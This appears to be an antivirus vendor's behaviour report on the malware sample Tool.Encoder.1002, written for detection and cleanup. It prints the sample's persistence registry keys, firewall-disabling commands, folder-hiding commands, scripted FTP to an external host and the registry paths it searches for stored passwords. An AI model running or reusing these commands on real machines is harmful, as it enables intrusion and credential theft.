Tool.Encoder.1002

Technical Information

To ensure autorun and distribution:

Modifies the following registry keys:

[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'stat7' = '"C:\Users\Public\Public Document\mdej.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'stat2' = '%ALLUSERSPROFILE%\Msn\Msn2\aagj.bat'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'stat' = '%ALLUSERSPROFILE%\Msn\Msn2\aagj.bat'

Malicious functions:

To bypass firewall, removes or modifies the following registry keys:

[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'

Creates and executes the following:

'C:\users\public\Public Document\AdobeR.exe' -f "amsn.klc"
'C:\users\public\Public Document\AdobeT.exe' -f "wmsn.klc"
'C:\users\public\Public Document\AcrobaP.exe'
'C:\users\public\Public Document\crb.exe' -d -p A1B2C3D4KD7123LS400S500201322419s080897654321 bar.zip.aes
'C:\users\public\Public Document\unzip.exe' -o bar.zip
'C:\users\public\Public Document\AcrobatR.exe' "wmsn.klb"

Executes the following:

'<SYSTEM32>\attrib.exe' +r +a +s +h "%ALLUSERSPROFILE%\Msn"
'<SYSTEM32>\netsh.exe' firewall set opmode disable
'<SYSTEM32>\ipconfig.exe' /all
'<SYSTEM32>\attrib.exe' +r +a +s +h "%ALLUSERSPROFILE%\Msn\Msn2"
'<SYSTEM32>\ftp.exe' -i -v -s:202.lmn ftp.freehostia.com
'%WINDIR%\regedit.exe' /s "cogj.reg"
'<SYSTEM32>\attrib.exe' +r +a +s +h "C:\users\public\public document"
'<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL C:\users\public\Public Document\docs.pdf
'<SYSTEM32>\cmd.exe' /c ""C:\users\public\Public Document\Adobe.bat" "
'<SYSTEM32>\wscript.exe' "C:\users\public\Public Document\tsbe.vbs"
'<SYSTEM32>\taskkill.exe' /f /im AcrobaP.exe
'<SYSTEM32>\xcopy.exe' /h /e /r /k /c /q /y *.* "%ALLUSERSPROFILE%\Msn\Msn2"
'<SYSTEM32>\cmd.exe' /c ""C:\users\public\Public Document\icj.bat" "
'<SYSTEM32>\wscript.exe' "C:\users\public\Public Document\saj.vbs"

Searches for registry branches where third party applications store passwords:

[<HKCU>\Software\Paltalk]
[<HKCU>\Software\Google\Google Talk\Accounts]

Modifies file system :

Creates the following files:

%ALLUSERSPROFILE%\Msn\Msn2\cogj.reg
%ALLUSERSPROFILE%\Msn\Msn2\AdobeT.exe
%ALLUSERSPROFILE%\Msn\Msn2\dj.vbs
%ALLUSERSPROFILE%\Msn\Msn2\icj.bat
%ALLUSERSPROFILE%\Msn\Msn2\docs.pdf
%ALLUSERSPROFILE%\Msn\Msn2\aagj.bat
%ALLUSERSPROFILE%\Msn\Msn2\202.lmn
%ALLUSERSPROFILE%\Msn\Msn2\AcrobaP.exe
%ALLUSERSPROFILE%\Msn\Msn2\AdobeR.exe
%ALLUSERSPROFILE%\Msn\Msn2\AcrobatR.exe
%ALLUSERSPROFILE%\Msn\Msn2\iej.bat
C:\users\public\Public Document\amsn.klc
C:\users\public\Public Document\wmsn.klb
C:\users\public\Public Document\wmsn.klc
C:\users\public\Public Document\msn.klc
%ALLUSERSPROFILE%\Msn\Msn2\keeprun.ini
%ALLUSERSPROFILE%\Msn\Msn2\iewj.bat
%ALLUSERSPROFILE%\Msn\Msn2\saj.vbs
C:\users\public\Public Document\adip.klc
%ALLUSERSPROFILE%\Msn\Msn2\tsbe.vbs
C:\users\public\Public Document\crb.pdf
C:\users\public\Public Document\bar.zip.aes
%ALLUSERSPROFILE%\Application Data\o3IIr0iSb\PCGWIN32.LI5
C:\users\public\Public Document\aagj.bat
C:\users\public\Public Document\bar.zip
C:\users\public\Public Document\tsbe.vbs
C:\users\public\Public Document\docs.pdf
C:\users\public\Public Document\unzip.pdf
C:\users\public\Public Document\Adobe.bat
C:\users\public\Public Document\202.pdf
C:\users\public\Public Document\AcrobaP.pdf
C:\users\public\Public Document\iej.bat
C:\users\public\Public Document\icj.bat
C:\users\public\Public Document\iewj.bat
C:\users\public\Public Document\saj.vbs
C:\users\public\Public Document\keeprun.ini
C:\users\public\Public Document\AdobeR.pdf
C:\users\public\Public Document\AcrobatR.pdf
C:\users\public\Public Document\AdobeT.pdf
C:\users\public\Public Document\dj.vbs
C:\users\public\Public Document\cogj.reg

Sets the 'hidden' attribute to the following files:

%ALLUSERSPROFILE%\Application Data\o3IIr0iSb\PCGWIN32.LI5

Deletes the following files:

C:\users\public\Public Document\unzip.exe
C:\users\public\Public Document\crb.exe
C:\users\public\Public Document\bar.zip.aes
C:\users\public\Public Document\bar.zip

Moves the following files:

from C:\users\public\Public Document\wmsn.klc to C:\users\public\Public Document\001_201427We_141153.038
from C:\users\public\Public Document\wmsn.klb to C:\users\public\Public Document\001_201427We_141153.037
from C:\users\public\Public Document\msn.klc to C:\users\public\Public Document\001_201427We_141153.036
from C:\users\public\Public Document\AdobeT.exe to C:\users\public\Public Document\AdobeT.pdf
from C:\users\public\Public Document\AdobeR.exe to C:\users\public\Public Document\AdobeR.pdf
from C:\users\public\Public Document\AcrobatR.exe to C:\users\public\Public Document\AcrobatR.pdf
from C:\users\public\Public Document\AcrobaP.pdf to C:\users\public\Public Document\AcrobaP.exe
from C:\users\public\Public Document\202.pdf to C:\users\public\Public Document\202.lmn
from C:\users\public\Public Document\crb.pdf to C:\users\public\Public Document\crb.exe
from C:\users\public\Public Document\unzip.pdf to C:\users\public\Public Document\unzip.exe
from C:\users\public\Public Document\AdobeT.pdf to C:\users\public\Public Document\AdobeT.exe
from C:\users\public\Public Document\AdobeR.pdf to C:\users\public\Public Document\AdobeR.exe
from C:\users\public\Public Document\AcrobatR.pdf to C:\users\public\Public Document\AcrobatR.exe

Network activity:

Connects to:

'localhost':1039
'ft#.##eehostia.com':21

UDP:

DNS ASK ft#.##eehostia.com

Miscellaneous:

Searches for the following windows:

ClassName: 'RegEdit_RegEdit' WindowName: ''
ClassName: 'Indicator' WindowName: ''
ClassName: '' WindowName: ''
ClassName: 'EDIT' WindowName: ''
ClassName: 'Shell_TrayWnd' WindowName: ''

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial